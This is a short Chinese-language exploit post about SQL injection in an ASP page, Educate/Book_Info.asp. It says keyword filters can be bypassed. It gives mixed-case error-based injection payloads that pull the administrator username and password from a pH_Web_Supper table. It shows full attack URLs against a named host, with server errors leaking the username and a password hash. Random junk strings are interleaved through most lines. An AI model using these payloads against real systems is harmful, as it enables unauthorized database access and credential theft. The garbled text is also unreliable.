漏洞出现在Educate/Book_Info.asp( [, U) K8 _* q6 ^) x# F
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
' X, \# \( P$ I/ S& S {! xexp:如下! }0 Q2 x6 x% e( ]
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper); ?! \& }4 d# f
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 v# m# @4 F: d4 `
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)- `2 h) K& F/ P+ v
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
3 ]0 `. H' i, W M- k# Z T) ^( N将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。4 A. t( M# ]6 h) X
/Educate/Book_Info.asp,行 8
. B5 }# x3 f/ S0 j& Phttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) h8 g* F5 T) O. e; O! e0 E. U
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
9 |2 b1 j5 K5 a5 G5 {将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
9 |: X' \! w# Y6 N ?1 d, m/Educate/Book_Info.asp,行 8 |